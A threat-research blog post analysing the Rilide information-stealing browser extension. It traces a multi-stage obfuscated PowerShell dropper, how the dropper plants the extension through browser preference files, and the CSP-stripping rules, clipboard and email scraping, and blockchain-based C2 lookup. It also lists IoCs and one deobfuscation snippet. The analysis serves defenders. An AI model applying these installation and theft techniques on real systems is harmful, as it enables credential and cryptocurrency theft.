Rilide: An Information Stealing Browser Extension
By Pulsedive Threat Research
Published: 2025-03-21 · Archived: 2026-04-05 20:02:50 UTC
Rilide is an example of an information stealer masquerading as a browser extension. First reported in April 2023, the
malware targets Chromium-based browsers such as Google Chrome and Microsoft Edge. It is designed to take screenshots
of information, log passwords, and collect credentials for cryptocurrency wallets. 
Rilide is delivered via malicious advertisements or phishing pages. When users interact with these payloads, a loader installs
the Rilide extension. Security researchers have observed Rilide impersonating Google Drive and Palo Alto extensions.
Associated IoCs can be accessed using Pulsedive’s Explore feature.
This blog outlines:
How Rilide is delivered
Walkthrough of an intrusion chain that dropped Rilide
Mitigation strategies
How Rilide is Delivered
Threat researchers have identified multiple delivery mechanisms used to drop Rilide, with phishing websites being the most
common. Versions from August 2023 were adapted to work with Chrome Extension Manifest V3. These changes include
removing the ability to execute external logic using executeScript() , eval() , and new Function() . Moreover,
Manifest V3 no longer allows developers to load and execute remotely hosted files; as such, all the logic must be part of the
extension package itself.
The newer Rilide versions were delivered using three different mechanisms.
1. The first campaign uses a PowerPoint lure with a phishing website to fetch the Rilide stealer.
2. The second campaign leverages Twitter as the initial lure. When interacting with the Twitter lure, the user is
redirected to a phishing website that downloads an executable file that sets up the malicious extension using an LNK
file.
3. Researchers at Trustwave grouped two separate vectors into a third campaign. One intrusion chain is similar to the
second campaign, with the only exception being the use of Google Ads instead of Twitter. The rest of the intrusion
chain remains the same. The last intrusion chain uses a PowerShell loader to install Rilide. It is unclear how the user
receives the PowerShell Loader.
https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/
Page 1 of 31

Figure 1: Campaigns leading to Rilide. This version of Rilide has been adapted to comply with the Chrome
Extension Manifest V3 requirements. Source: Hacker News
The sample we analyzed for this blog belongs to campaign 3, which uses a PowerShell loader to install the malicious
extension.
An Intrusion Dropping Rilide
A PowerShell Dropper
Toward the end of November 2024, VMRay shared details about a PowerShell script used to drop a Rilide sample. As of
March 15, 2025, VirusTotal indicates that only four vendors flag the script as malicious. The earliest sample in the intrusion
chain starts with the PowerShell script identified by VMRay; however, the exact way the script was delivered to the user is
unknown. Figure 2 shows the complete intrusion chain observed during analysis.
Figure 2: Intrusion chain observed during analysis
https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/
Page 2 of 31

Figure 3: VirusTotal results for the PowerShell script as of March 15, 2025. Source: VirusTotal
File Details
Characteristic Value
MD5 650052f23efde0ed4460b760134db8c6
SHA-1 286574e458cddb32032ba4935d7f8e2716cfcf2c
SHA-256 76afc4a7ef10d760c3fa42458e8f133f1ed4d76071ab6f4207037f64a4bffab7
File Size 2.15 KB
File Extension ps1
Behavior
First Stage
When the PowerShell script is run, it launches another PowerShell instance that executes base64 encoded commands
without displaying the PowerShell window to the user. 
Figure 4: Encoded PowerShell command captures within VMRay. Source: VMRay
The base64 encoded content can be decoded using CyberChef’s From Base64 recipe. The decoded content contains a base64
encoded string, which is manipulated by replacing characters and XOR operations before being passed to the PowerShell
function DownloadString as the URI. 
https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/
Page 3 of 31

Figure 5: Decoded PowerShell script contains base64 encoded values that go through a series of character
manipulations.
The URI can be decoded by running the code snippet within PowerShell before the script creates a new web client
connection. 
$lUhpJ = ("kpC3/7WN/qCHo4b2sP@tgrfwv/+UrZ6oqfGIj4egrL7xlJeHt/GWt4OX+/s=")
$HgwsG = $lUhpJ.Replace("@", "a")
$TWJXW = [Convert]::FromBase64String($HgwsG) | ForEach-Object { $_ -bxor 198}
$ZLb8q = [System.Text.Encoding]::ASCII.GetString($TWJXW).Replace("@", "a")
$RUveK = [Convert]::FromBase64String($ZLb8q)
$QK9tt = [byte[]](37, 46, 201, 192, 220);
$eyMTA = 0;
$CJC2W = $RUveK | ForEach-Object {
$_ -bxor $QK9tt[$eyMTA++];
if ($eyMTA -ge $QK9tt.Length) {
$eyMTA = 0
}
}
$CJC2W
Calling the parameter that holds the ASCII values for the URI returns the array string shown in Figure 6 below.
Figure 6: ASCII values holding the second stage domain
https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/
Page 4 of 31

The array of ASCII values can be decoded using the PowerShell command $mdKyK =
[System.Text.Encoding]::ASCII.GetString($CJC2W); or using CyberChef’s From Decimal recipe.
Figure 7: The ASCII values converted into text to reveal the second stage URI.
WHOIS data for the decoded domain shows that it was registered with NameCheap. Moreover, the domain was registered
on October 5, 2024, approximately a month before the post from VMRay.  
Figure 8: WHOIS data within the Pulsedive platform for tcl-black[.]com
https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/
Page 5 of 31

The domain was unreachable as of March 15, 2025, but historical data was stored on URLscan.io. The webpage contained
obfuscated code that the PowerShell script manipulates by replacing certain characters before converting it from base64.
Once the command is decoded, it is executed using PowerShell. 
Figure 9: A historical scan showing the content hosted on the decoded URL. Source: URLscan.io
The character conversations employed during this stage are:
Original Value New Value
! l
* d
`” T
‘ H
; F
https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/
Page 6 of 31

Figure 10: Decoded content from tcl-black[.]com reveals additional PowerShell Commands 
Second Stage
The decoded script contains another blob of base64 that goes through a series of manipulations before being executed using
the iex command. The first manipulation is a series of character replacements that change certain symbols into characters
within the base64 character set. The replacements are:
Original Value New Value
% d
$ a
! b
@ B
This data is converted from base64 and XORed with a byte array. Following the XOR operation, the data is decrypted using
AES256 in Cipher Block Chaining mode with a padding of PKCS7. The decryption key and initialization vector are stored
as hardcoded variables that are base64 encoded.
Figure 11: The decoded PowerShell script pulled from tcl-black[.]com
https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/
Page 7 of 31

Third Stage - Setting up Rilide
The decrypted data is additional PowerShell code that is executed. This code is used to install the Rilide extension. The
PowerShell script's primary function is FCZoL, which first attempts to gather the current user's SID.
Figure 12: Decrypted content from the second stage PowerShell Script that shows additional PowerShell
commands.
Figure 13: The script uses PowerShell cmdlets to get the local user
The script then generates a random string that is 80 characters long and consists of alphanumeric characters. The following
line of the script converts a string of bytes into a UTF-8 encoded string. This string contains a base64 blob containing JSON
data that appears to be related to the Rilide extension. 
Figure 14: Character set returned from a function within PowerShell.
Figure 15: Base64 content reveals content that is later added to the Secure Preferences for managing settings
for a Chrome Profile. 
Figure 16: Extension details added to Secure Preferences.
The PowerShell script then creates strings that hold paths to web browsers. The browsers targeted, and the paths specified in
the malware are:
https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/
Page 8 of 31

Figure 17: PowerShell code used to create paths to web browser content on disk.
Web Browser Path
Chrome %localappdata%/Google/Chrome/User Data
Brave %localappdata%/BraveSoftware/Brave-Browser/User Data
Edge %localappdata%/Microsoft/Edge/User Data
Opera %appdata%/Opera Software/Opera Stable
The PowerShell script contains all the content that makes up the Rilide files as hardcoded base64 strings. These strings are
within the function aRUC2M . This function takes the previously created character set and the directory name where the
extension will be stored. In this case, the directory name is $MxNC2$JJ0wH , as shown in the figure below.
Figure 18: Path where the Rilide files are saved on disk.
The script attempts to create the path shown in Figure 18 and then tries to create files within that directory. 
Figure 19: Code used to create the $MxNC2$JJ0wH directory and drop the Rilide files.
Each file that makes up the Rilide extension and its content is stored as base64-encoded pairs. The first variable is the file
name, and the second is the actual content. The script writes the file for any file name containing the extension *.png . If
the file is contains the string manifest.json , a set of character replacements occurs before it is written to disk. For all other
files, the script just writes the content to a file on disk.
Encoded File Name Decoded File Name
https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/
Page 9 of 31

YXBwLmh0bWw= app.html
Y29uZmlnLmpz config.js
ZmlsZV9haGxkZmguanM= file_ahldfh.js
ZmlsZV9hdWtqemxsdGkuanM= file_aukjzllti.js
ZmlsZV9la3pwbHNqLmpz file_ekzplsj.js
ZmlsZV9namVpd3pzdC5qcw== file_gjeiwzst.js
ZmlsZV9wamJtY2dtLmpz file_pjbmcgm.js
aWNvLnBuZw== ico.png
bWFuaWZlc3QuanNvbg== manifest.json
cnVsZXMuanNvbg== rules.json
ZGlyX2pzcGN1eWZ1XGZpbGVfZGZlYWt5ZmlyLmpz dir_jspcuyfu\file_dfeakyfir.js
ZGlyX2pzcGN1eWZ1XGZpbGVfa3ZueW5hLmpz dir_jspcuyfu\file_kvnyna.js
ZGlyX2pzcGN1eWZ1XGZpbGVfdXFyZnRpanRnai5qcw== dir_jspcuyfu\file_uqrftijtgj.js
ZGlyX2pzcGN1eWZ1XGRpcl9rbWlkZ1xmaWxlX215aHBuLmpz dir_jspcuyfu\dir_kmidg\file_myhpn.js
ZGlyX2pzcGN1eWZ1XGRpcl9rbWlkZ1xmaWxlX253ZXFnaGxudS5qcw== dir_jspcuyfu\dir_kmidg\file_nweqghln
ZGlyX2pzcGN1eWZ1XGRpcl9yb2RtcnFjenpcZmlsZV9mbXRxbi5qcw== dir_jspcuyfu\dir_rodmrqczz\file_fmtqn
ZGlyX2pzcGN1eWZ1XGRpcl9yb2RtcnFjenpcZmlsZV9qcmZ4ZS5qcw== dir_jspcuyfu\dir_rodmrqczz\file_jrfxe.
ZGlyX2pzcGN1eWZ1XGRpcl9yb2RtcnFjenpcZmlsZV9uZ2dtZ2dpcXYuanM= dir_jspcuyfu\dir_rodmrqczz\file_nggm
ZGlyX2pzcGN1eWZ1XGRpcl9yb2RtcnFjenpcZmlsZV9uaXZ2aGRjLmpz dir_jspcuyfu\dir_rodmrqczz\file_nivvh
https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/
Page 10 of 31

ZGlyX2pzcGN1eWZ1XGRpcl9yb2RtcnFjenpcZmlsZV9vbnRjYWNyb3MuanM= dir_jspcuyfu\dir_rodmrqczz\file_ontca
ZGlyX2pzcGN1eWZ1XGRpcl9yb2RtcnFjenpcZmlsZV9yem56dnB3Lmpz dir_jspcuyfu\dir_rodmrqczz\file_rznzv
ZGlyX2pzcGN1eWZ1XGRpcl9yb3ZoemJ6ZXhlXGZpbGVfYWFjY2hvYWZzdi5qcw== dir_jspcuyfu\dir_rovhzbzexe\file_aacc
ZGlyX2pzcGN1eWZ1XGRpcl9yb3ZoemJ6ZXhlXGZpbGVfYXZla2lmcnQuanM= dir_jspcuyfu\dir_rovhzbzexe\file_avek
ZGlyX2pzcGN1eWZ1XGRpcl9yb3ZoemJ6ZXhlXGZpbGVfZHdvcGJkeC5qcw== dir_jspcuyfu\dir_rovhzbzexe\file_dwo
ZGlyX2pzcGN1eWZ1XGRpcl9yb3ZoemJ6ZXhlXGZpbGVfc3Rla2xwZ3ouanM= dir_jspcuyfu\dir_rovhzbzexe\file_stekl
ZGlyX2pzcGN1eWZ1XGRpcl9yb3ZoemJ6ZXhlXGZpbGVfeGlmanQuanM= dir_jspcuyfu\dir_rovhzbzexe\file_xifjt
ZGlyX2pzcGN1eWZ1XGRpcl9yb3ZoemJ6ZXhlXGZpbGVfeXdkZ3dkdW5kLmpz dir_jspcuyfu\dir_rovhzbzexe\file_ywd
ZGlyX2pzcGN1eWZ1XGRpcl92aHdwY3dsYXhpXGZpbGVfYnBmZWxlLmpz dir_jspcuyfu\dir_vhwpcwlaxi\file_bpfe
ZGlyX2pzcGN1eWZ1XGRpcl92aHdwY3dsYXhpXGZpbGVfb2RybHVzaC5qcw== dir_jspcuyfu\dir_vhwpcwlaxi\file_odrl
ZGlyX2pzcGN1eWZ1XGRpcl92aHdwY3dsYXhpXGZpbGVfcmFwd2hjYXJhLmpz dir_jspcuyfu\dir_vhwpcwlaxi\file_rapw
ZGlyX2pzcGN1eWZ1XGRpcl92aHdwY3dsYXhpXGZpbGVfdnF5YmJyaGcuanM= dir_jspcuyfu\dir_vhwpcwlaxi\file_vqy
ZGlyX2pzcGN1eWZ1XGRpcl93empnZ3JsXGZpbGVfY3hoamNla3YuanM= dir_jspcuyfu\dir_wzjggrl\file_cxhjcekv
ZGlyX2pzcGN1eWZ1XGRpcl93empnZ3JsXGZpbGVfZGl6c3kuanM= dir_jspcuyfu\dir_wzjggrl\file_dizsy.js
ZGlyX2pzcGN1eWZ1XGRpcl93empnZ3JsXGZpbGVfaHJ0c2RyZy5qcw== dir_jspcuyfu\dir_wzjggrl\file_hrtsdrg.j
ZGlyX2pzcGN1eWZ1XGRpcl93empnZ3JsXGZpbGVfa253dnlqaGcuanM= dir_jspcuyfu\dir_wzjggrl\file_knwvyjh
ZGlyX2pzcGN1eWZ1XGRpcl93empnZ3JsXGZpbGVfcHpib3ptby5qcw== dir_jspcuyfu\dir_wzjggrl\file_pzbozmo
ZGlyX2pzcGN1eWZ1XGRpcl93empnZ3JsXGZpbGVfcW5tb2lleC5qcw== dir_jspcuyfu\dir_wzjggrl\file_qnmoiex
ZGlyX2pzcGN1eWZ1XGRpcl93empnZ3JsXGZpbGVfdHdrbWlicXkuanM= dir_jspcuyfu\dir_wzjggrl\file_twkmibq
https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/
Page 11 of 31

ZGlyX2pzcGN1eWZ1XGRpcl93empnZ3JsXGZpbGVfdmlnbGJ0Y29zdC5qcw== dir_jspcuyfu\dir_wzjggrl\file_viglbtco
ZGlyX2pzcGN1eWZ1XGRpcl93empnZ3JsXGZpbGVfeHRhZXouanM= dir_jspcuyfu\dir_wzjggrl\file_xtaez.js
ZGlyX295cm5vcXFcZmlsZV9heGVscy5qcw== dir_oyrnoqq\file_axels.js
ZGlyX295cm5vcXFcZmlsZV9iaHNoZXpoZW54Lmpz dir_oyrnoqq\file_bhshezhenx.js
ZGlyX295cm5vcXFcZmlsZV9mcG1vbGJzLmpz dir_oyrnoqq\file_fpmolbs.js
ZGlyX295cm5vcXFcZmlsZV9qZnJuZS5qcw== dir_oyrnoqq\file_jfrne.js
ZGlyX295cm5vcXFcZmlsZV9ra3V5bXpxbmNzLmpz dir_oyrnoqq\file_kkuymzqncs.js
ZGlyX295cm5vcXFcZmlsZV9rc2xreGN6Z3FzLmpz dir_oyrnoqq\file_kslkxczgqs.js
ZGlyX295cm5vcXFcZmlsZV9wYWV3a3h5Lmpz dir_oyrnoqq\file_paewkxy.js
ZGlyX295cm5vcXFcZmlsZV90cWR4bnltZi5qcw== dir_oyrnoqq\file_tqdxnymf.js
ZGlyX295cm5vcXFcZmlsZV91c3poZ24uanM= dir_oyrnoqq\file_uszhgn.js
ZGlyX295cm5vcXFcZmlsZV96YWJhcC5qcw== dir_oyrnoqq\file_zabap.js
ZGlyX295cm5vcXFcZGlyX2Nxd3VjdWlpZFxmaWxlX2FicG5hb2guanM= dir_oyrnoqq\dir_cqwucuiid\file_abpna
ZGlyX295cm5vcXFcZGlyX2Nxd3VjdWlpZFxmaWxlX2VsbXpsb3VyeC5qcw== dir_oyrnoqq\dir_cqwucuiid\file_elmzl
ZGlyX295cm5vcXFcZGlyX2Nxd3VjdWlpZFxmaWxlX2hmZXpkanBoei5qcw== dir_oyrnoqq\dir_cqwucuiid\file_hfezdj
ZGlyX295cm5vcXFcZGlyX2Nxd3VjdWlpZFxmaWxlX29xaHV2d3h0ei5qcw== dir_oyrnoqq\dir_cqwucuiid\file_oqhuv
ZGlyX295cm5vcXFcZGlyX2RvbnhxXGZpbGVfYXJwaHB4bm5oLmpz dir_oyrnoqq\dir_donxq\file_arphpxnnh
ZGlyX295cm5vcXFcZGlyX2RvbnhxXGZpbGVfY2R0dnlrb2ouanM= dir_oyrnoqq\dir_donxq\file_cdtvykoj.j
ZGlyX295cm5vcXFcZGlyX2RvbnhxXGZpbGVfaGRodm92Lmpz dir_oyrnoqq\dir_donxq\file_hdhvov.js
https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/
Page 12 of 31

ZGlyX295cm5vcXFcZGlyX2RvbnhxXGZpbGVfanltanUuanM= dir_oyrnoqq\dir_donxq\file_jymju.js
ZGlyX295cm5vcXFcZGlyX2RvbnhxXGZpbGVfbGdsZHFwdWxxZy5qcw== dir_oyrnoqq\dir_donxq\file_lgldqpulq
ZGlyX295cm5vcXFcZGlyX2RvbnhxXGZpbGVfbWNoY3RycWNuLmpz dir_oyrnoqq\dir_donxq\file_mchctrqcn
ZGlyX295cm5vcXFcZGlyX2RvbnhxXGZpbGVfcnFxYXEuanM= dir_oyrnoqq\dir_donxq\file_rqqaq.js
ZGlyX295cm5vcXFcZGlyX2RvbnhxXGZpbGVfd3hudnB4Lmpz dir_oyrnoqq\dir_donxq\file_wxnvpx.js
ZGlyX295cm5vcXFcZGlyX3Z6amtmXGZpbGVfY3l2aW9oaWpkai5qcw== dir_oyrnoqq\dir_vzjkf\file_cyviohijdj.j
ZGlyX295cm5vcXFcZGlyX3Z6amtmXGZpbGVfZGN5dGdiaS5qcw== dir_oyrnoqq\dir_vzjkf\file_dcytgbi.js
ZGlyX295cm5vcXFcZGlyX3Z6amtmXGZpbGVfZnhoemJjd3NxLmpz dir_oyrnoqq\dir_vzjkf\file_fxhzbcwsq
ZGlyX295cm5vcXFcZGlyX3Z6amtmXGZpbGVfZ3F5bHZraGpzLmpz dir_oyrnoqq\dir_vzjkf\file_gqylvkhjs.j
ZGlyX295cm5vcXFcZGlyX3Z6amtmXGZpbGVfaHJxeGIuanM dir_oyrnoqq\dir_vzjkf\file_hrqxb.js
ZGlyX295cm5vcXFcZGlyX3Z6amtmXGZpbGVfbWdsZWxpdWd3Lmpz dir_oyrnoqq\dir_vzjkf\file_mgleliugw.
ZGlyX295cm5vcXFcZGlyX3Z6amtmXGZpbGVfb3hmc2d3YnUuanM= dir_oyrnoqq\dir_vzjkf\file_oxfsgwbu.j
ZGlyX295cm5vcXFcZGlyX3Z6amtmXGZpbGVfcXhjc2xyeC5qcw== dir_oyrnoqq\dir_vzjkf\file_qxcslrx.js
ZGlyX295cm5vcXFcZGlyX3Z6amtmXGZpbGVfc252dGEuanM= dir_oyrnoqq\dir_vzjkf\file_snvta.js
ZGlyX295cm5vcXFcZGlyX3Z6amtmXGZpbGVfc3NjcHJvdS5qcw== dir_oyrnoqq\dir_vzjkf\file_sscprou.js
ZGlyX3BkaGZ4bnBreFxmaWxlX2Fzb3RsZS5qcw== dir_pdhfxnpkx\file_asotle.js
ZGlyX3BkaGZ4bnBreFxmaWxlX2ZyYmpiZ2Z4eC5qcw== dir_pdhfxnpkx\file_frbjbgfxx.js
ZGlyX3BkaGZ4bnBreFxmaWxlX2hocHpxYnpzLmpz dir_pdhfxnpkx\file_hhpzqbzs.js
ZGlyX3BkaGZ4bnBreFxmaWxlX2htZnpxaS5qcw== dir_pdhfxnpkx\file_hmfzqi.js
https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/
Page 13 of 31

ZGlyX3BkaGZ4bnBreFxmaWxlX2xlcHJjZ25qZC5qcw== dir_pdhfxnpkx\file_leprcgnjd.js
ZGlyX3BkaGZ4bnBreFxmaWxlX25tZ3dwcnVlaHcuanM= dir_pdhfxnpkx\file_nmgwpruehw.js
ZGlyX3BkaGZ4bnBreFxmaWxlX3lmYmxma3RjYS5qcw== dir_pdhfxnpkx\file_yfblfktca.js
ZGlyX3BkaGZ4bnBreFxmaWxlX3lvc2dpZWFnbGcuanM= dir_pdhfxnpkx\file_yosgieaglg.js
ZGlyX3BkaGZ4bnBreFxkaXJfZ3JhY3ZmXGZpbGVfbGx3dnRvaHYuanM= dir_pdhfxnpkx\dir_gracvf\file_llwvtoh
ZGlyX3BkaGZ4bnBreFxkaXJfZ3JhY3ZmXGZpbGVfbHV2b2ouanM= dir_pdhfxnpkx\dir_gracvf\file_luvoj.js
ZGlyX3BkaGZ4bnBreFxkaXJfZ3JhY3ZmXGZpbGVfb2ltbGpuYWdzbC5qcw== dir_pdhfxnpkx\dir_gracvf\file_oimljna
ZGlyX3BkaGZ4bnBreFxkaXJfZ3JhY3ZmXGZpbGVfcHRwdm1zdm5xaC5qcw== dir_pdhfxnpkx\dir_gracvf\file_ptpvms
ZGlyX3BkaGZ4bnBreFxkaXJfZ3JhY3ZmXGZpbGVfdWRnZ3AuanM= dir_pdhfxnpkx\dir_gracvf\file_udggp.j
ZGlyX3BkaGZ4bnBreFxkaXJfZ3JhY3ZmXGZpbGVfdWRvbG9sLmpz dir_pdhfxnpkx\dir_gracvf\file_udolol.j
ZGlyX3BkaGZ4bnBreFxkaXJfZ3JhY3ZmXGZpbGVfdXhseHdrbWEuanM= dir_pdhfxnpkx\dir_gracvf\file_uxlxwk
ZGlyX3BkaGZ4bnBreFxkaXJfdG9qaXJ6XGZpbGVfZHR1cmV2Z2ptay5qcw== dir_pdhfxnpkx\dir_tojirz\file_dturevgj
ZGlyX3BkaGZ4bnBreFxkaXJfdG9qaXJ6XGZpbGVfZmNhZXRmdm9ubi5qcw== dir_pdhfxnpkx\dir_tojirz\file_fcaetfvo
ZGlyX3BkaGZ4bnBreFxkaXJfdG9qaXJ6XGZpbGVfZnJwZ3hmcGsuanM= dir_pdhfxnpkx\dir_tojirz\file_frpgxfpk
ZGlyX3BkaGZ4bnBreFxkaXJfdG9qaXJ6XGZpbGVfanpuYncuanM= dir_pdhfxnpkx\dir_tojirz\file_jznbw.js
ZGlyX3BkaGZ4bnBreFxkaXJfdG9qaXJ6XGZpbGVfbXFqZG9sd2wuanM= dir_pdhfxnpkx\dir_tojirz\file_mqjdolw
ZGlyX3BkaGZ4bnBreFxkaXJfdG9qaXJ6XGZpbGVfdGVmeHlhby5qcw== dir_pdhfxnpkx\dir_tojirz\file_tefxyao.j
ZGlyX3BkaGZ4bnBreFxkaXJfdG9qaXJ6XGZpbGVfdm50aGhwZC5qcw== dir_pdhfxnpkx\dir_tojirz\file_vnthhpd
ZGlyX3BkaGZ4bnBreFxkaXJfdG9qaXJ6XGZpbGVfeGl1Zm9odi5qcw== dir_pdhfxnpkx\dir_tojirz\file_xiufohv.
https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/
Page 14 of 31

ZGlyX3BkaGZ4bnBreFxkaXJfdG9qaXJ6XGZpbGVfeWVudHRreXFvLmpz dir_pdhfxnpkx\dir_tojirz\file_yenttkyq
bW9kdWxlc1xjb250ZW50LXNjcmlwdHMtcmVnaXN0ZXItcG9seWZpbGwuNC4wLjAuanM= modules\content-scripts-register-polyf
c3JjXFRvZ2dsZVRlc3QuanM= src\ToggleTest.js
c3JjXGNvbnRlbnRcQWxlcnRSZWNlaXZlLmpz src\content\AlertReceive.js
c3JjXGNvbnRlbnRcT3BlblJlbW92ZS5qcw== src\content\OpenRemove.js
c3JjXGZpbmRlclxBbmFseXplUGFpbnQuanM= src\finder\AnalyzePaint.js
c3JjXGZpbmRlclxBc3NpZ25UZXN0Lmpz src\finder\AssignTest.js
c3JjXGZpbmRlclxDb3B5UmVkdWNlLmpz src\finder\CopyReduce.js
c3JjXGZpbmRlclxEcmFnQ3JlYXRlLmpz src\finder\DragCreate.js
c3JjXGZpbmRlclxEcmF3Lmpz src\finder\Draw.js
c3JjXGZpbmRlclxFbmFibGVQZWVrLmpz src\finder\EnablePeek.js
c3JjXGZpbmRlclxGb2N1cy5qcw== src\finder\Focus.js
c3JjXGZpbmRlclxQcm9maWxlSW5zdGFsbENsb25lLmpz src\finder\ProfileInstallClone.js
c3JjXGZpbmRlclxTaG93SGFuZGxlRHJhdy5qcw== src\finder\ShowHandleDraw.js
c3JjXGZ1bmN0aW9uc1xDbG9zZVJlZHVjZS5qcw== src\functions\CloseReduce.js
c3JjXGZ1bmN0aW9uc1xEZWxldGUuanM= src\functions\Delete.js
c3JjXGZ1bmN0aW9uc1xEcmFnU3VtbWFyaXplLmpz src\functions\DragSummarize.js
c3JjXGZ1bmN0aW9uc1xJbnZlcnQuanM= src\functions\Invert.js
c3JjXGZ1bmN0aW9uc1xPcHRpbWl6ZUV2YWx1YXRlLmpz src\functions\OptimizeEvaluate.js
https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/
Page 15 of 31

c3JjXGZ1bmN0aW9uc1xQcmludC5qcw== src\functions\Print.js
c3JjXGZ1bmN0aW9uc1xSZWNlaXZlLmpz src\functions\Receive.js
c3JjXGZ1bmN0aW9uc1xSZW1vdmUuanM= src\functions\Remove.js
c3JjXGZ1bmN0aW9uc1xSZXN1bWVSZXN1bWVNaXJyb3IuanM= src\functions\ResumeResumeMirror.js
c3JjXGZ1bmN0aW9uc1xSZXRyaWV2ZVVwZGF0ZVN1Ym1pdC5qcw== src\functions\RetrieveUpdateSubmit.js
c3JjXGZ1bmN0aW9uc1xSdW5EZXBsb3lGb2N1cy5qcw== src\functions\RunDeployFocus.js
c3JjXGZ1bmN0aW9uc1xTYXZlLmpz src\functions\Save.js
c3JjXGZ1bmN0aW9uc1xTZWxlY3REcmF3Lmpz src\functions\SelectDraw.js
c3JjXGZ1bmN0aW9uc1xXYWl0Lmpz src\functions\Wait.js
c3JjXG1haWxzXFJlbGVhc2UuanM= src\mails\Release.js
The last step in the PowerShell script is to add the extension to the different web browsers specified within the script itself.
Figure 20: Function calls to add the Rilide extension to the targeted web browsers.
Before installing the malicious extension, the PowerShell script terminates any running instances of the web browsers
targeted before the extension is enabled. The extension is installed only for the user who is logged in when the script is
running. It then attempts to modify the Secure Preferences or the Preferences file (for MSedge) within the Default or
Profile subdirectories. The content shown in Figure 16 is updated to reflect the path shown in Figure 18. Once this
modification occurs, it is added to the Secure Preferences JSON file. The script also checks if the extension is installed; if it
is, the content is updated to API content extracted by the script. Otherwise, it adds the content to the file.
https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/
Page 16 of 31

Figure 21: Code used to add the content shown in Figure 16 to files used by the web browsers. This is used to
add the extension to the web browser.
Once the extension path is added to the preferences file, the PowerShell script waits 4 seconds before launching the web
browser. 
Figure 22: The content from Figure 16 is updated to reflect the path to Rilide. The path was previously shown
in Figure 18. 
Rilide Browser Extension
Like TrustWave's reporting, the malware masquerades as a Google Drive utility that claims to save content to Google Drive.
The extension's permissions indicate that it can interact with cookies, clipboard data, and system information. Rilide uses
injected scripts to steal credentials and cryptocurrency and take screenshots. 
https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/
Page 17 of 31

Figure 23: Functionality present within Rilide. Source: Hacker News
The extension masquerades as a Google Drive utility that aims to help users save content to Drive. This is indicated by the
name and description specified in the manifest.json file and the extension’s icon.
Figure 24: A screenshot showing Rilide installed in Google Chrome.
https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/
Page 18 of 31

Figure 25: Details about the Rilide extension within Google Chrome.
Figure 26: The malware uses the Google Drive icon as its icon.
The main files in the extension are:
config.js
manifest.json
rules.json
ico.png
src/ToggleTest.js
src/content/OpenRemove.js
src/content/AlertReceive.js
src/content/Release.js
The extension’s directory contains other JavaScript files with helper functions that expand its functionality. These files are
essential to the three scripts injected into each webpage. 
Figure 27: Files within the Rilide directory.
manifest.json
https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/
Page 19 of 31

The extension’s manifest.json shows that the extension can query system information such as CPU and storage information.
It can also access the browser’s local storage. Moreover, the extension allows access to the clipboard for reading and writing
capabilities. The service worker is a file called ToggleTest.js. The extension injects three scripts into every webpage,
collecting information from the pages. The scripts are:
OpenRemove.js
AlertReceive.js
Release.js  
Figure 28: Content of the manifest.json file
Figure 29: The manifest.json file shows the injected scripts and declarative_net_request specifications.
💡
https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/
Page 20 of 31

For more information about how Browser Extensions work, please read our
blog
.
The rules.json is specified as part of the declarative_net_request objects, an API that blocks or modifies web requests. In
this case, the API adjusts the content security policy to help remove headers.
rules.json
Figure 30: The rules declared within the rules.json that are used to remove content security policies. 
The rules.json file is used to modify headers in network requests and removes any content security policy values set by the
web pages. 
config.js
Figure 31: Configuration parameters for Rilide, including the ability to set up a Telegram C2 channel.
The config file contains references to Telegram and Web-based panels. However, this sample does not appear to have a
Telegram panel, as shown by the lack of details within the TelegramPanel object. 
ToggleTest.js
ToggleTest.js is a heavily obfuscated file that imports functions from other JavaScript files. The file call functions to collect
system information, execute commands, and take screenshots.
https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/
Page 21 of 31

Figure 32: Functions imported by the service worker, ToggleTest.js, to expand its functionality. 
OpenReceive.js
This file was heavily obfuscated and used event listeners to collect messages from cryptocurrency exchanges and other
websites, such as Facebook and Google Pay. Before grabbing information, the malware checks local storage in the web
browser to obtain settings used to gather what information Rilide collects.
https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/
Page 22 of 31

Figure 33: Code used to create event listeners that look for cryptocurrency details.
AlertReceive.js
The AlertReceive.js file is used to read and write text from the clipboard. 
Figure 34: Code used to interact with the clipboard.
Release.js
This file collects content from email applications. The injected code checks whether the web page is Outlook, Yahoo, or
Gmail. Once the email application has been identified, the script examines the DOM content on the web page to collect
information about the emails. 
Figure 35: Deobfuscated code from Release.js that looks for Outlook, Yahoo, and Gmail pages.
https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/
Page 23 of 31

Research from Trellix outlines that Rilide looks for messages from cryptocurrency exchanges and modifies their content to
collect credentials from users when they attempt to log in to the exchange. 
Figure 36: Notes from Trellix indicate that Rilide modified emails to lure users into signing into their
cryptocurrency accounts. Source: Trellix
Network Traffic
💡
A packet capture of Rilide network traffic and SSL decryption keys are provided as a reference.
C2 Resolution using Dead Drops
Rilide queries different blockchain services to obtain the C2 server, which is stored as a base58-encoded value in another
cryptocurrency address. The blockchain services queried include:
Blockstream
Bitcoin Explorer
Blockcypher
Mempool
Bitcore
The Bitcoin address that the malware looks up is bc1qkljhfktumxjqa52yle0xzz9nd4jl40vzyyc066.
Figure 37: Cryptocurrency transaction to the BitCoin address the malware looks up. Source: Blockchain.com
https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/
Page 24 of 31

Figure 38: Requests to blockstream.info that return another BitCoin address that also doubles as the C2
address for the malware. 
Figure 38: Requests to Blockcypher showing the second BitCoin address.
